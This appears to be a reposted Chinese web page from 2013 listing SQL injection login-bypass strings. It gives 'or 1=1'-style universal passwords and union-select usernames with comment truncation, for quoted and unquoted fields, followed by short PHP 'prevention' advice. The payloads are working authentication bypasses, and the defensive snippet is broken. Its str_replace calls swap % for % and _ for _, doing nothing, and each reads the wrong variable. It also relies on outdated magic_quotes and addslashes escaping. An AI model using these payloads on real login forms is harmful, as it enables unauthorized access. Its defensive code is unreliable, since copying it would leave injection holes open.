您的位置:首页 > 数据库

sql万能注入语句

2013-01-23 00:00 981 查看
1.针对有单引号的情况 :
万能密码 : select * from users where username='xxxx' and password='xxxxxx' or 1='1';
万能用户名 : select * from users where username='xxxx' union select * from users/* and password='xxxxx';
防止第一种万能密码 : 设置 php.ini 中的 magic_quotes_gpc = On ;
2.没有单引号的情况 :
万能密码 : select * from users where username=数字 and password=数字 union select * from users;
万能用户名 : select * from users where username= 数字 union select * from users/* and password=数字;
3.搜索SQL注入的情况 :
防止查询SQL的攻击,对关键字进行过滤 :
//当php.ini中magic_quotes_gpc开启时,不要使用addslashes,否则会造成双重转义

$keyword = addslashes($keywords)

$keyword = str_replace("%","%",$keywords);

$keyword = str_replace("_","_",$keywords);

$sql= "select * from users where username like '%$keyword%'";
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  sql 注入 万能 语句